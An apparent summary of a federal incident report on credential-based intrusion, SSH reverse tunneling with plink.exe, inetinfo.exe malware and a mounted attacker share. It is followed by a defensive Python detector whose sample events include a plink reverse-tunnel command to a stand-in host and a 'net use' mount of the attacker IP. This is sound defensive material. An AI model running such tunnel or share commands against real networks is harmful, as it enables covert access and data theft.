A potential network compromise incident is reported on a federal agency’s enterprise network in which the cyber threat actor had valid access credentials for multiple users’ Microsoft Office 365 (O365) accounts and domain administrator accounts. These credentials were used for initial access to the organization’s network. First, the threat actor logged into a user’s O365 account, then browsed pages on a SharePoint site and downloaded a file. The cyber threat actor connected multiple times by Transmission Control Protocol (TCP) to the victim organization’s virtual private network (VPN) server. It is possible the cyber actor obtained the credentials from an unpatched agency VPN server by exploiting a known vulnerability—CVE-2019-11510—in Pulse Secure, as wide exploitation of CVE-2019-11510 has already been observed.
After initial access, the threat actor logged into an agency O365 email account to view and download help desk email attachments with “Intranet access” and “VPN passwords” in the subject line, despite already having privileged access. (Note: these emails did not contain any passwords.) The actor logged into the same email account via Remote Desktop Protocol (RDP), enumerated the Active Directory and Group Policy key, and changed a registry key for the Group Policy. Immediately afterward, the threat actor used common Microsoft Windows command line processes—conhost, ipconfig, net, query, netstat, ping, whoami, and plink.exe—to enumerate the compromised system and network.
The cyber threat actor then attempted multiple times to connect to a virtual private server (VPS) through a Windows Server Message Block (SMB) client. Although they connected and disconnected multiple times, the connections were ultimately successful. During the same period, the actor used an alias secure identifier account they had previously created to log into the VPS via an SMB share. The attacker then executed plink.exe on a victim file server.
The cyber threat actor established Persistence and Command and Control on the victim network by creating a persistent Secure Socket Shell (SSH) tunnel/reverse SOCKS proxy, by running inetinfo.exe (a unique, multi-stage malware used to drop files), and by setting up a locally mounted remote share on IP address 78.27.70[.]237. The mounted file share allowed the actor to move freely during its operations while leaving fewer artifacts for forensic analysis. The cyber threat actor created a local account, which they used for data Collection, Exfiltration, Persistence, and Command and Control.
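A defender-side illustration of the persistence and mounted-share activity described above, added here and not part of the original report: it runs three checks over constructed process-creation events (the JSON field names, the sample command lines, and the legitimate IIS path for inetinfo.exe are assumptions; the share host is the IP the summary names).

```python
import ipaddress
import json
import re

# Constructed process-creation events (not from the report). Field names
# loosely mimic a Sysmon Event ID 1 export; only "image" and "cmd" are used.
SAMPLE_EVENTS = r"""
{"image": "C:\\Users\\svc\\plink.exe", "cmd": "plink.exe -N -R 8080 -P 443 user@203.0.113.10 -pw x"}
{"image": "C:\\Windows\\System32\\net.exe", "cmd": "net use Z: \\\\78.27.70.237\\share /user:tmp"}
{"image": "C:\\Windows\\System32\\net.exe", "cmd": "net use H: \\\\fs01.corp.local\\home"}
{"image": "C:\\Windows\\Temp\\inetinfo.exe", "cmd": "inetinfo.exe"}
{"image": "C:\\Windows\\System32\\inetsrv\\inetinfo.exe", "cmd": "inetinfo.exe"}
"""

UNC_HOST = re.compile(r"\\\\([A-Za-z0-9.\-]+)\\")  # host part of a \\host\share path
# Assumed location of the legitimate IIS binary on the monitored hosts.
IIS_INETINFO = r"c:\windows\system32\inetsrv\inetinfo.exe"


def is_public(host):
    """True only for a literal, globally routable IP; hostnames are left to asset checks."""
    try:
        return ipaddress.ip_address(host).is_global
    except ValueError:
        return False


def classify(event):
    """Return a list of finding strings for one process-creation event."""
    image = event["image"].lower()
    cmd = event["cmd"]
    name = image.rsplit("\\", 1)[-1]
    findings = []
    # plink -R forwards a remote port back to the client: the reverse tunnel/SOCKS pattern.
    if name == "plink.exe" and re.search(r"(^|\s)-R\s", cmd):
        findings.append("reverse tunnel via plink.exe -R")
    # "net use" against a public IP is the locally mounted remote share pattern.
    if name == "net.exe" and " use " in cmd.lower():
        match = UNC_HOST.search(cmd)
        if match and is_public(match.group(1)):
            findings.append(f"remote share mounted from public host {match.group(1)}")
    # inetinfo.exe is an IIS binary; a copy anywhere else is masquerading.
    if name == "inetinfo.exe" and image != IIS_INETINFO:
        findings.append(f"inetinfo.exe outside IIS directory: {event['image']}")
    return findings


def scan(jsonl):
    """Yield (command line, finding) pairs for every flagged event in a JSON-lines string."""
    results = []
    for line in jsonl.strip().splitlines():
        event = json.loads(line)
        results.extend((event["cmd"], f) for f in classify(event))
    return results
```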